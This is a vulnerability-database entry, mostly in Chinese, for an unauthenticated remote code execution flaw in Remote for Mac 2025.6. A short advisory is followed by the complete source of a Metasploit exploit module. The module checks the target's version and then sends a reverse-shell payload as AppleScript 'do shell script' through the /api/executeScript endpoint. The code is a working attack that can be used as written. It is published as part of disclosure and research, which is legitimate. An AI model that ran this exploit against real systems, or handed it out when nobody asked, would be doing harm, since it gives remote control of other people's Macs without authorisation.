Remote for Mac 20256 - Unauthenticated RCE

漏洞信息

漏洞名称: Remote for Mac 2025.6 - Unauthenticated RCE

漏洞编号:

  • CVE: Pending

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: Remote for Mac 2025.6是一款专为macOS设计的远程控制软件,允许用户通过网络远程控制另一台Mac电脑。该软件广泛应用于个人和企业环境中,用于远程技术支持、家庭网络管理等场景。

该漏洞存在于Remote for Mac 2025.6的/api/executeScript端点,由于未对用户输入进行充分验证,攻击者可以在无需认证的情况下,通过构造特定的HTTP请求,向目标系统发送恶意的AppleScript命令。利用AppleScript的do shell script功能,攻击者可以执行任意shell命令,从而实现远程代码执行。

此漏洞的利用可能导致严重的安全风险,包括但不限于远程控制受影响系统、数据泄露、服务中断等。由于漏洞利用无需认证,且可以自动化执行,因此攻击门槛较低,潜在影响范围广泛。建议用户及时更新至安全版本,或采取其他缓解措施以防止潜在攻击。

产品厂商: Cherpake

产品名称: Remote for Mac

影响版本: 2025.6

来源: https://github.com/rapid7/metasploit-framework/blob/3f6f4d20993489afed96fe110b52a625dfbec434/modules%2Fexploits%2Fosx%2Fhttp%2Fremote_for_mac_rce.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126

##
# Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE MSF Module
# Date: May 2025
# Exploit Author: Chokri Hammedi (@chokri0x00)
# Vendor Homepage: https://www.cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Exploit Source: https://packetstormsecurity.com/files/195347/
# Version: Remote for Mac 2025.6
# Tested on: macOS Mojave, macOS Ventura
##

require 'json'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Remote for Mac 2025.6 - Unauthenticated RCE',
        'Description' => %q{
          This module exploits an unauthenticated remote code execution vulnerability in
          Remote for Mac 2025.6 via the /api/executeScript endpoint. When authentication is
          disabled on the target system, it allows attackers to execute arbitrary AppleScript
          commands, which can include shell commands via `do shell script`.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Chokri Hammedi (@blue0x1)'],
        'References' => [
          ['URL', 'https://packetstorm.news/files/id/195347/']
        ],
        'DisclosureDate' => '2025-05-27',
        'CVE' => 'Pending',
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [['Auto', {}]],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 49229,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]
        }
      )
    )

    register_options([
      Opt::RHOST(),
      Opt::RPORT(49229),
      OptBool.new('SSL', [true, 'Enable SSL/TLS', true]),
      OptString.new('LHOST', [true, 'Local host to receive reverse shell']),
      OptInt.new('LPORT', [true, 'Local port to receive reverse shell', 4444]),
      OptBool.new('FORCE', [false, 'Force exploitation even if checks fail', false])
    ])
  end

  def check
    return CheckCode::Unknown('Skipping version/auth checks (--force)') if datastore['FORCE']

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'getVersion'),
      'method' => 'GET',
      'ssl' => datastore['SSL']
    )

    return CheckCode::Unknown('No response from target') unless res && res.code == 200

    begin
      info = JSON.parse(res.body)
    rescue JSON::ParserError
      return CheckCode::Unknown('Unable to parse JSON from /api/getVersion')
    end

    if info['requires.auth'] == true
      return CheckCode::Safe('Target requires authentication on /api/executeScript')
    end

    if info['version'] != '2025.6'
      return CheckCode::Safe("Target version is #{info['version']}, not vulnerable")
    end

    CheckCode::Appears
  end

  def exploit
    unless datastore['FORCE'] || check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target does not appear vulnerable')
    end

    print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
    cmd = payload.encoded
    escaped = cmd.gsub('\\', '\\\\\\').gsub('"', '\"')
    applescript = %(do shell script "#{escaped}")

    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
      'method' => 'GET',
      'ssl' => datastore['SSL'],
      'headers' => {
        'X-ClientToken' => '1337',
        'X-HostName' => 'iFruit',
        'X-HostFullModel' => 'iFruit19,2',
        'X-Script' => applescript,
        'X-ScriptName' => 'exploit',
        'X-ScriptDelay' => '0'
      }
    )

    if res && res.code == 200
      print_good('Payload delivered successfully. Awaiting session...')
    else
      fail_with(Failure::Unknown, "Unexpected HTTP response: #{res ? res.code : 'no response'}")
    end
  end
end